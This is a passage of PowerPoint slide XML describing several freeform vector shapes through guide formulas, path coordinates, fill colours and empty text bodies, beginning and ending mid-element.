              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="28" h="10">
                <a:moveTo>
                  <a:pt x="28" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10266" name="Freeform 347"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1389062" y="7748588"/>
            <a:ext cx="366713" cy="123825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 162"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T2" fmla="*/ 0 w 162"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T33" fmla="*/ 0 h 55"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T68" fmla="*/ 0 w 162"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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2"/>
              <a:gd name="T106" fmla="*/ 0 h 55"/>
              <a:gd name="T107" fmla="*/ 162 w 162"/>
              <a:gd name="T108" fmla="*/ 55 h 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2" h="55">
                <a:moveTo>
                  <a:pt x="0" y="17"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10267" name="Freeform 348"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1755775" y="7734300"/>
            <a:ext cx="128587" cy="58738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T5" fmla="*/ 0 h 26"/>
              <a:gd name="T6" fmla="*/ 0 w 57"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T8" fmla="*/ 0 w 57"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 60000 65536"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 w 57"/>
              <a:gd name="T19" fmla="*/ 0 h 26"/>
              <a:gd name="T20" fmla="*/ 57 w 5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7" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10268" name="Freeform 349"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1414462" y="7488238"/>
            <a:ext cx="73025" cy="276225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T15" fmla="*/ 0 h 122"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T17" fmla="*/ 0 h 122"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T19" fmla="*/ 0 h 122"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T21" fmla="*/ 0 h 122"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T23" fmla="*/ 0 h 122"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T25" fmla="*/ 0 h 122"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T32" fmla="*/ 0 w 32"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T34" fmla="*/ 0 w 32"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 122"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 12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
              <a:gd name="T106" fmla="*/ 0 h 122"/>
              <a:gd name="T107" fmla="*/ 32 w 32"/>
              <a:gd name="T108" fmla="*/ 122 h 12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 h="122">
                <a:moveTo>
                  <a:pt x="32" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10269" name="Freeform 350"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1417637" y="7491413"/>
            <a:ext cx="60325" cy="233362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 0 h 104"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 0 h 104"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 0 h 104"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 0 h 104"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 0 h 104"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 0 h 104"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 0 h 104"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T32" fmla="*/ 0 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T34" fmla="*/ 0 w 27"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T36" fmla="*/ 0 w 27"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 1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
              <a:gd name="T106" fmla="*/ 0 h 104"/>
              <a:gd name="T107" fmla="*/ 27 w 27"/>
              <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10270" name="Freeform 351"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1420812" y="7493000"/>
            <a:ext cx="50800" cy="188913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T11" fmla="*/ 0 h 84"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T13" fmla="*/ 0 h 84"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T15" fmla="*/ 0 h 84"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T17" fmla="*/ 0 h 84"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T19" fmla="*/ 0 h 84"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T21" fmla="*/ 0 h 84"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T23" fmla="*/ 0 h 84"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T25" fmla="*/ 0 h 84"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 22"/>
